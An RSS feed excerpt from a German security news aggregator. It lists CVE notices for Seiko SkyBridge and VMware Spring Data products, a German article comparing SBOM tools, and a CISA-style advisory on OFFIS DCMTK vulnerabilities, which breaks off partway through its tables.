<title><![CDATA[CVE-2026-50043 | Seiko Solutions SkyBridge MB-A100/SkyBridge MB-A110 os command injection (EUVD-2026-40929)]]></title>
<description><![CDATA[A vulnerability has been found in Seiko Solutions SkyBridge MB-A100 and SkyBridge MB-A110 and classified as critical. This vulnerability affects unknown code. The manipulation leads to os command injection. This vulnerability only affects products that are no longer supported by the maintainer.

...]]></description>
<link>https://tsecurity.de/de/3638310/sicherheitsluecken/cve-2026-50043-seiko-solutions-skybridge-mb-a100skybridge-mb-a110-os-command-injection-euvd-2026-40929/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3638310/sicherheitsluecken/cve-2026-50043-seiko-solutions-skybridge-mb-a100skybridge-mb-a110-os-command-injection-euvd-2026-40929/</guid>
<pubDate>Wed, 01 Jul 2026 13:26:19 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability has been found in <a href="https://vuldb.com/product/seiko_solutions:skybridge_mb-a100">Seiko Solutions SkyBridge MB-A100 and SkyBridge MB-A110</a> and classified as <a href="https://vuldb.com/kb/risk">critical</a>. This vulnerability affects unknown code. The manipulation leads to os command injection. This vulnerability only affects products that are no longer supported by the maintainer.

This vulnerability is referenced as <a href="https://vuldb.com/cve/CVE-2026-50043">CVE-2026-50043</a>. Remote exploitation of the attack is possible. No exploit is available.]]></content:encoded>
</item>
<item>
<title><![CDATA[Software Bill of Material umsetzen: Die besten SBOM-Tools]]></title>
<description><![CDATA[Nur wenn Sie wissen, was drinsteckt, können Sie sich sicher sein, dass alles mit rechten Dingen zugeht. Das gilt für Fast Food wie für Software.  Foto: Geka – shutterstock.com




Um Software abzusichern, muss man wissen, was in ihrem Code steckt. Aus diesem Grund ist eine Software Bill of Materi...]]></description>
<link>https://tsecurity.de/de/3637351/it-security-nachrichten/software-bill-of-material-umsetzen-die-besten-sbom-tools/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3637351/it-security-nachrichten/software-bill-of-material-umsetzen-die-besten-sbom-tools/</guid>
<pubDate>Wed, 01 Jul 2026 06:08:11 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img decoding="async" alt="Nur wenn Sie wissen, was drinsteckt, können Sie sich sicher sein, dass alles mit rechten Dingen zugeht. Das gilt für Fast Food wie für Software. " title="Nur wenn Sie wissen, was drinsteckt, können Sie sich sicher sein, dass alles mit rechten Dingen zugeht. Das gilt für Fast Food wie für Software. " src="https://images.computerwoche.de/bdb/3353396/1200x.jpg" width="1200" loading="lazy"><figcaption class="wp-element-caption"><p class="foundryImageCaption">Nur wenn Sie wissen, was drinsteckt, können Sie sich sicher sein, dass alles mit rechten Dingen zugeht. Das gilt für Fast Food wie für Software. </p></figcaption></figure><p class="imageCredit"> Foto: Geka – shutterstock.com</p></div>




<p>Um Software abzusichern, muss man wissen, was in ihrem Code steckt. Aus diesem Grund ist eine Software Bill of Material, SBOM oder Software-Stückliste heute unerlässlich. Der SolarWinds-Angriff sowie die Log4j-Schwachstelle haben verdeutlicht, wie wichtig es ist, die Sicherheit von Softwarelieferketten in den Fokus zu nehmen – insbesondere, wenn es um Open Source Software geht. <a href="https://www.sonarsource.com/open-source-maintainer-survey-2023.pdf" target="_blank" rel="noreferrer noopener">Einer Umfrage</a> (PDF) des Open-Source-Unternehmens Tidelift zufolge enthalten heute 92 Prozent aller Anwendungen Open-Source-Komponenten. Eine durchschnittliche, moderne Applikation besteht demnach sogar zu 70 Prozent aus quelloffener Software.</p>



<p>Die Antwort auf die potenziellen Risiken sind – wenn es nach der <a title="Linux Foundation" href="https://www.linuxfoundation.org/tools/the-state-of-software-bill-of-materials-sbom-and-cybersecurity-readiness/" target="_blank" rel="noopener">Linux Foundation</a>, der <a title="Open Source Security Foundation" href="https://openssf.org/" target="_blank" rel="noopener">Open Source Security Foundation</a> und <a title="OpenChain" href="https://www.openchainproject.org/" target="_blank" rel="noopener">OpenChain</a> geht – SBOMs: Formale und maschinenlesbare Metadaten, die ein Softwarepaket und seinen Inhalt eindeutig identifizieren. Die Software-Stücklisten können auch andere Informationen enthalten, etwa Copyright- oder Lizenzdaten. Dabei ist eine Software Bill of Material so konzipiert, dass sie organisationsübergreifend ausgetauscht werden kann. Besonders hilfreich ist eine SBOM, um die Transparenz über die von den Teilnehmern einer Softwarelieferkette gelieferten Komponenten zu gewährleisten.</p>



<h2 class="wp-block-heading">SBOM – Best Practices</h2>



<p>Eine SBOM sollte beinhalten:</p>



<ul class="wp-block-list">
<li><p>die Open-Source-Bibliotheken der Anwendung;</p></li>



<li><p>Plugins, Erweiterungen und andere Zusatzmodule;</p></li>



<li><p>von In-House-Entwicklern selbst geschriebenen Quellcode;</p></li>



<li><p>Informationen über die Versionen dieser Komponenten, ihren Lizenzierungs- und Patch-Status;</p></li>



<li><p>automatische kryptografische Signatur und Überprüfung von Komponenten;</p></li>



<li><p>automatische Scans, um SBOMs als Teil der CI/CD-Pipeline zu erstellen.</p></li>
</ul>



<p>Dabei sollte eine Software Bill of Material ein einheitliches Format verwenden. Zu den gängigen SBOM-Formaten gehören:</p>



<ul class="wp-block-list">
<li><p>Software Package Data Exchange (SPDX),</p></li>



<li><p>Software Identification (SWID) Tagging und</p></li>



<li><p>OWASP CycloneDX.</p></li>
</ul>



<p>Bislang hat sich keiner der drei Standards von den anderen abgesetzt und einen De-facto-Industriestandard geschaffen. Um SBOMs praktikabel zu machen, sollte die SBOM-Erstellung nicht nur automatisiert, sondern in die CI/CD-Pipeline integriert werden. Oder wie die National Telecommunications and Information Administration (NTIA) es <a title="ausdrückt" href="https://www.ntia.doc.gov/files/ntia/publications/copado_-_2021.06.17.pdf" target="_blank" rel="noopener">ausdrückt</a> (PDF): “Das ultimative Ziel ist es, SBOMs in Maschinengeschwindigkeit zu generieren.”</p>



<h2 class="wp-block-heading">Software Bill of Materials – Use Cases</h2>



<p>Auch bei SBOMs gibt es drei verschiedene Anwendungsfälle. Im Allgemeinen sind das:</p>



<ol class="wp-block-list">
<li><p><strong>Softwarehersteller</strong> verwenden SBOMs, um Erstellung und Wartung der von ihnen gelieferten Software zu unterstützen.</p></li>



<li><p><strong>Softwareeinkäufer</strong> nutzen SBOMs, um sich vor dem Kauf abzusichern, Rabatte auszuhandeln und Implementierungsstrategien aufzusetzen.</p></li>



<li><p><strong>Softwarebetreiber</strong> nutzen SBOMs für das Vulnerability- und Asset-Management, um Lizenzen und Compliance zu managen und Abhängigkeiten und Risiken in Sachen Software und Komponenten schnell zu identifizieren.</p></li>
</ol>



<h2 class="wp-block-heading">Empfehlenswerte SBOM-Tools</h2>



<p>Bei drei verschiedenen SBOM-Formaten und einer Vielzahl von Metadaten, die innerhalb einer Software Bill of Material verfolgt werden können, ist es nicht verwunderlich, dass es kein SBOM-Tool gibt, das sämtliche Bedürfnisse erfüllt. <a href="https://anchore.com/sbom/gartner-innovation-insights-sboms/" title="Gartner empfiehlt" target="_blank" rel="noopener">Gartner empfiehlt</a>, Tools zu verwenden, die folgende Funktionen mitbringen:</p>



<ul class="wp-block-list">
<li><p>SBOMs während des Build-Prozesses erstellen;</p></li>



<li><p>Quellcode und Binärdateien (wie Container-Images) analysieren;</p></li>



<li><p>SBOMs bearbeiten;</p></li>



<li><p>SBOMs in lesbaren Formaten anzeigen, vergleichen, importieren und validieren;</p></li>



<li><p>SBOM-Inhalte von einem Format oder Dateityp in andere übersetzen, beziehungsweise die Informationen zusammenführen; </p></li>



<li><p>Einbindung anderer Tools über APIs und Bibliotheken;</p></li>
</ul>



<p>Keines der folgenden acht Tools erfüllt (bislang) all diese Empfehlungen. Wir empfehlen Ihnen, die Tools auszuprobieren und anschließend zu ermitteln, welches für Ihre Zwecke am besten geeignet ist. Diese acht SBOM-Tools verdienen Ihre Aufmerksamkeit:</p>



<p><strong><a href="https://anchore.com/sbom/" title="Anchore" target="_blank" rel="noopener">Anchore</a></strong></p>



<p>Das Unternehmen ist bereits seit sechs Jahren im SBOM-Business tätig. Die Grundlage des Unternehmens bilden zwei Open-Source-Projekte:</p>



<ul class="wp-block-list">
<li><p>Syft ist ein Tool mit Kommandozeilen-Interface und eine Bibliothek, um SBOMs aus Container-Images und Dateisystemen zu erzeugen. </p></li>



<li><p>Grype ist ein einfach zu integrierendes Tool, um Container-Images und Dateisysteme auf Schwachstellen zu scannen.</p></li>
</ul>



<p>Zusammen können diese beiden Werkzeuge Software-Stücklisten in jeder Phase des Entwicklungsprozesses erzeugen, von Quellcode-Repositories und CI/CD-Pipelines bis hin zu Container-Registries und Laufzeiten. Diese SBOMs werden in einem zentralen Repository aufbewahrt, um vollständige Transparenz und kontinuierliches Monitoring zu gewährleisten – auch nach der Bereitstellung. Die Tools von Anchore unterstützen CycloneDX, SPDX und das proprietäre SBOM-Format von Syft. Das Anbieterunternehmen bündelt seine SBOM-Funktionalität in der Plattform Anchore Enterprise 4.0 Software SCM (Supply Chain Management).</p>



<p><strong><a href="https://fossa.com/lp/simplify-sbom-generation-fossa" title="FOSSA" target="_blank" rel="noopener">FOSSA</a></strong></p>



<p>Die Flaggschiff-Programme von FOSSA sind ein Open Source License Compliance Manager und ein Open Source Vulnerability Scanner. Der Ansatz von FOSSA sieht vor, dass Sie das SBOM-Tool in Ihr bevorzugtes Versionskontrollsystem wie GitHub, BitBucket oder GitLab integrieren. Sie können auch die CLI von FOSSA verwenden und das Tool lokal ausführen oder es in Ihre CI/CD-Pipeline integrieren.</p>



<p>In jedem Fall identifiziert FOSSA im Rahmen eines Projektscans automatisch sowohl direkte als auch indirekte Abhängigkeiten in der Codebasis.</p>



<p><strong><a href="https://about.gitlab.com/" target="_blank" rel="noreferrer noopener">GitLab (ehemals Rezilion)</a></strong></p>



<p>Beim DevSecOps-Anbieter ist SBOM Teil seiner ganzheitlichen Software-Sicherheits- und Schwachstellen-Systeme. Dynamic SBOM verwendet eine dynamische Laufzeitanalyse, um die Angriffsfläche Ihrer Software zu monitoren. Es sucht also ständig nach bekannten Schwachstellen in den Komponenten. Neben der Bereitstellung eines Live-Inventars aller Softwarekomponenten in Ihren CI/CD-, Staging- und Produktionsumgebungen wird Ihre SBOM ständig aktualisiert. Sie können Ihre Software Bill of Material im CycloneDX-Format und als Excel-Tabelle exportieren.</p>



<p>Nach der Übernahme durch GitLab wurden die SBOM-Funktionalitäten von Rezilion im Jahr 2022 <a href="https://about.gitlab.com/blog/2022/03/23/gitlab-rezilion-integration-reduces-vulnerability-backlog-identifies-exploitable-risks-to-fix/">in die DevSecOps-Plattform integriert</a>.</p>



<p><strong><a title="Mend" href="https://www.mend.io/sca/" target="_blank" rel="noopener">Mend</a></strong></p>



<p>Früher unter dem Namen WhiteSource bekannt, bietet Mend eine Vielzahl von SCA-Tools (Software Composition Analysis) an. Eine SBOM-Funktionalität ist in das SCA-Toolset integriert. Die Lösung von Mend ist weniger ein Entwicklerprogramm oder ein CI/CD-Tool – sondern vielmehr ein Open-Source-Lizenz- und Sicherheitsmechanismus für Programmierer.</p>



<p>Mit Hilfe von Mend lassen sich sämtliche Softwarekomponenten tracken, direkte und indirekte Abhängigkeiten identifizieren, Schwachstellen aufdecken, Remediationspfade bereitstellen und automatisch SBOM-Einträge aktualisieren.</p>



<p><strong><a href="https://github.com/opensbom-generator/spdx-sbom-generator" title="SPDX SBOM Generator" target="_blank" rel="noopener">SPDX SBOM Generator</a></strong></p>



<p>Dieses eigenständige Open-Source-Tool tut das, was sein Name verspricht: SPDX-SBOMs aus aktuellen Paketmanagern oder Build-Systemen erstellen. Sie können seine CLI verwenden, um SBOM-Daten aus Ihrem Code zu erzeugen. Das Tool erzeugt Berichte über Komponenten, Lizenzen, Copyrights und Sicherheitsreferenzen Ihres Codes. Diese Daten werden in der SPDX v2.2-Spezifikation exportiert.</p>



<p><strong><a href="https://www.startleftsecurity.com/tauruseer-application-security-posture-management-platform" title="Start Left Security" target="_blank" rel="noopener">Start Left Security</a></strong></p>



<p>Dieses SBOM-Tool wird als Software-as-a-Service (SaaS) angeboten. Auf der Grundlage einer patentierten, anwendungszentrierten Integrationsmethodik kombiniert das ehemals unter dem Namen TauruSeer bekannte Angebot seine Cognition-Engine-Sicherheitsüberprüfung mit SBOM. Das Paket hilft Ihnen, Ihren Code für Ihre Entwickler und Kunden abzusichern und zu tracken.</p>



<p><strong><a href="https://github.com/tern-tools/tern" title="Tern Project" target="_blank" rel="noopener">Tern Project</a></strong></p>



<p>Dieses quelloffene SBOM-Projekt lässt sich gut mit SPDX SBOM Generator kombinieren. Anstatt mit Paketmanagern oder Build-Systemen zu arbeiten, erzeugt dieses SCA-Tool und die Python-Bibliothek eine SBOM für Container-Images und Docker-Dateien. Darüber hinaus lassen sich auch SBOMs im SPDX-Format erzeugen.</p>



<p><strong><a href="https://www.vigilant-ops.com/products/" title="Vigilant Ops" target="_blank" rel="noopener">Vigilant Ops</a></strong></p>



<p>Dieser Cybersicherheitsanbieter aus dem Healthcare-Bereich konzentriert sich mit seiner InSight-Plattform auf Software-Stücklisten. Seine SaaS-Plattform generiert und pflegt zertifizierte SBOMs und sorgt für deren authentifizierten Austausch. Sie bietet Sicherheit durch kontinuierliche Schwachstellenüberwachung. Die SBOM-Zertifizierung verwendet patentierte Algorithmen, um sicherzustellen, dass alle Komponenten validiert und Schwachstellen verlinkt sind.</p>



<p>Die Sicherheitsfunktionen können auch für SBOMs verwendet werden, die von anderen Programmen erstellt wurden. Diese werden sowohl im Ruhezustand als auch während der Übertragung verschlüsselt.</p>



<p><strong>Dieser Artikel ist <a href="https://www.csoonline.com/article/573225/8-top-sbom-tools-to-consider.html" target="_blank">im Original</a> bei unserer Schwesterpublikation CSOonline.com erschienen.</strong></p>
</div></div></div>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-2818 | VMware Spring Data Geode/Spring Data Gemfire on Windows Import Snapshot path traversal]]></title>
<description><![CDATA[A vulnerability was found in VMware Spring Data Geode and Spring Data Gemfire on Windows. It has been classified as critical. This vulnerability affects unknown code of the component Import Snapshot Handler. Performing a manipulation results in relative path traversal. This vulnerability only aff...]]></description>
<link>https://tsecurity.de/de/3637239/sicherheitsluecken/cve-2026-2818-vmware-spring-data-geodespring-data-gemfire-on-windows-import-snapshot-path-traversal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3637239/sicherheitsluecken/cve-2026-2818-vmware-spring-data-geodespring-data-gemfire-on-windows-import-snapshot-path-traversal/</guid>
<pubDate>Wed, 01 Jul 2026 04:08:48 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/vmware:spring_data_geode">VMware Spring Data Geode and Spring Data Gemfire</a> on Windows. It has been classified as <a href="https://vuldb.com/kb/risk">critical</a>. This vulnerability affects unknown code of the component <em>Import Snapshot Handler</em>. Performing a manipulation results in relative path traversal. This vulnerability only affects products that are no longer supported by the maintainer.

This vulnerability was named <a href="https://vuldb.com/cve/CVE-2026-2818">CVE-2026-2818</a>. The attack may be initiated remotely. There is no available exploit.]]></content:encoded>
</item>
<item>
<title><![CDATA[OFFIS DCMTK Toolkit]]></title>
<description><![CDATA[View CSAF
Summary
Successful exploitation of these vulnerabilities could allow an attacker to write files, access unauthorized information, exhaust memory, or crash affected DCMTK client or server processes.
The following versions of OFFIS DCMTK Toolkit are affected:

DCMTK]]></description>
<link>https://tsecurity.de/de/3636222/it-security-nachrichten/offis-dcmtk-toolkit/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3636222/it-security-nachrichten/offis-dcmtk-toolkit/</guid>
<pubDate>Tue, 30 Jun 2026 18:24:28 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><a href="https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsma-26-181-01.json"><strong>View CSAF</strong></a></p>
<h2>Summary</h2>
<p><strong>Successful exploitation of these vulnerabilities could allow an attacker to write files, access unauthorized information, exhaust memory, or crash affected DCMTK client or server processes.</strong></p>
<p>The following versions of OFFIS DCMTK Toolkit are affected:</p>
<ul>
<li>DCMTK &lt;=3.7.0 (CVE-2026-50003, CVE-2026-50254, CVE-2026-35505, CVE-2026-52868, CVE-2026-44628)</li>
</ul>
<div class="csaf-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS</th>
<th role="columnheader">Vendor</th>
<th role="columnheader">Equipment</th>
<th role="columnheader">Vulnerabilities</th>
</tr>
</thead>
<tbody>
<tr>
<td>v3 9.8</td>
<td>OFFIS</td>
<td>OFFIS DCMTK Toolkit</td>
<td>Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal'), Missing Release of Memory after Effective Lifetime, Access of Resource Using Incompatible Type ('Type Confusion')</td>
</tr>
</tbody>
</table>
</div>
<h3>Background</h3>
<ul>
<li><strong>Critical Infrastructure Sectors: </strong>Healthcare and Public Health</li>
<li><strong>Countries/Areas Deployed: </strong>Worldwide</li>
<li><strong>Company Headquarters Location: </strong>Germany</li>
</ul>
<hr>
<h2>Vulnerabilities</h2>
<div class="csaf-accordion">
<p><a class="csaf-accordion-toggle-all" href="https://www.cisa.gov/#">Expand All +</a></p>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-50003</a></h3>
<div class="csaf-accordion-content">
<p>A malicious or compromised server can make a DCMTK client using bit-preserving C-GET storage mode write files outside the chosen output directory, using both relative (../) paths and absolute paths.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-50003">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>OFFIS DCMTK Toolkit</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>OFFIS</div>
<div class="ics-version"><strong>Product Version:</strong><br>OFFIS DCMTK: &lt;=3.7.0</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>The maintainer was notified of these vulnerabilities and has provided a fix. The fix is included in the latest commits and can be obtained in the following snapshot:</p>
<p><strong>Vendor fix</strong><br>https://github.com/DCMTK/dcmtk/releases/tag/latest.<br><a href="https://github.com/DCMTK/dcmtk/releases/tag/latest">https://github.com/DCMTK/dcmtk/releases/tag/latest</a></p>
<p><strong>Mitigation</strong><br>Users are recommended to download the latest GitHub release once it becomes available.</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/22.html">CWE-22 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>9.8</td>
<td>CRITICAL</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
<tr>
<td>4.0</td>
<td>9.3</td>
<td>CRITICAL</td>
<td><a href="https://www.first.org/cvss/calculator/4.0#CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N">CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-50254</a></h3>
<div class="csaf-accordion-content">
<p>An unauthenticated remote attacker can repeatedly send a single crafted connection request to leak memory. Against storescp in its default single-process mode, memory grows quickly and the service is eventually killed, after which it stops accepting connections until an operator restarts it.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-50254">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>OFFIS DCMTK Toolkit</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>OFFIS</div>
<div class="ics-version"><strong>Product Version:</strong><br>OFFIS DCMTK: &lt;=3.7.0</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>The maintainer was notified of these vulnerabilities and has provided a fix. The fix is included in the latest commits and can be obtained in the following snapshot:</p>
<p><strong>Vendor fix</strong><br>https://github.com/DCMTK/dcmtk/releases/tag/latest.<br><a href="https://github.com/DCMTK/dcmtk/releases/tag/latest">https://github.com/DCMTK/dcmtk/releases/tag/latest</a></p>
<p><strong>Mitigation</strong><br>Users are recommended to download the latest GitHub release once it becomes available.</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/401.html">CWE-401 Missing Release of Memory after Effective Lifetime</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.5</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
<tr>
<td>4.0</td>
<td>8.7</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/4.0#CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N">CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-35505</a></h3>
<div class="csaf-accordion-content">
<p>An unauthenticated remote attacker can repeatedly send crafted connection requests to leak memory. In single-process deployments the memory grows until the service is killed and the port stops responding until restart.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-35505">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>OFFIS DCMTK Toolkit</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>OFFIS</div>
<div class="ics-version"><strong>Product Version:</strong><br>OFFIS DCMTK: &lt;=3.7.0</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>The maintainer was notified of these vulnerabilities and has provided a fix. The fix is included in the latest commits and can be obtained in the following snapshot:</p>
<p><strong>Vendor fix</strong><br>https://github.com/DCMTK/dcmtk/releases/tag/latest.<br><a href="https://github.com/DCMTK/dcmtk/releases/tag/latest">https://github.com/DCMTK/dcmtk/releases/tag/latest</a></p>
<p><strong>Mitigation</strong><br>Users are recommended to download the latest GitHub release once it becomes available.</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/401.html">CWE-401 Missing Release of Memory after Effective Lifetime</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.5</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
<tr>
<td>4.0</td>
<td>8.7</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/4.0#CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N">CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-52868</a></h3>
<div class="csaf-accordion-content">
<p>An unauthenticated attacker can read worklist records from a directory outside the intended per-AE worklist storage area. In a multi-area deployment, this can cross departmental or clinic data separation.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-52868">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>OFFIS DCMTK Toolkit</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>OFFIS</div>
<div class="ics-version"><strong>Product Version:</strong><br>OFFIS DCMTK: &lt;=3.7.0</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>The maintainer was notified of these vulnerabilities and has provided a fix. The fix is included in the latest commits and can be obtained in the following snapshot:</p>
<p><strong>Vendor fix</strong><br>https://github.com/DCMTK/dcmtk/releases/tag/latest.<br><a href="https://github.com/DCMTK/dcmtk/releases/tag/latest">https://github.com/DCMTK/dcmtk/releases/tag/latest</a></p>
<p><strong>Mitigation</strong><br>Users are recommended to download the latest GitHub release once it becomes available.</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/22.html">CWE-22 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>8.2</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N">CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N</a></td>
</tr>
<tr>
<td>4.0</td>
<td>8.8</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/4.0#CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N">CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-44628</a></h3>
<div class="csaf-accordion-content">
<p>An unauthenticated attacker can crash the worklist server with a single crafted query when the server has a valid Called AE Title / storage directory, the expected lockfile, and at least one matching worklist record.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-44628">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>OFFIS DCMTK Toolkit</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>OFFIS</div>
<div class="ics-version"><strong>Product Version:</strong><br>OFFIS DCMTK: &lt;=3.7.0</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>The maintainer was notified of these vulnerabilities and has provided a fix. The fix is included in the latest commits and can be obtained in the following snapshot:</p>
<p><strong>Vendor fix</strong><br>https://github.com/DCMTK/dcmtk/releases/tag/latest.<br><a href="https://github.com/DCMTK/dcmtk/releases/tag/latest">https://github.com/DCMTK/dcmtk/releases/tag/latest</a></p>
<p><strong>Mitigation</strong><br>Users are recommended to download the latest GitHub release once it becomes available.</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/843.html">CWE-843 Access of Resource Using Incompatible Type ('Type Confusion')</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
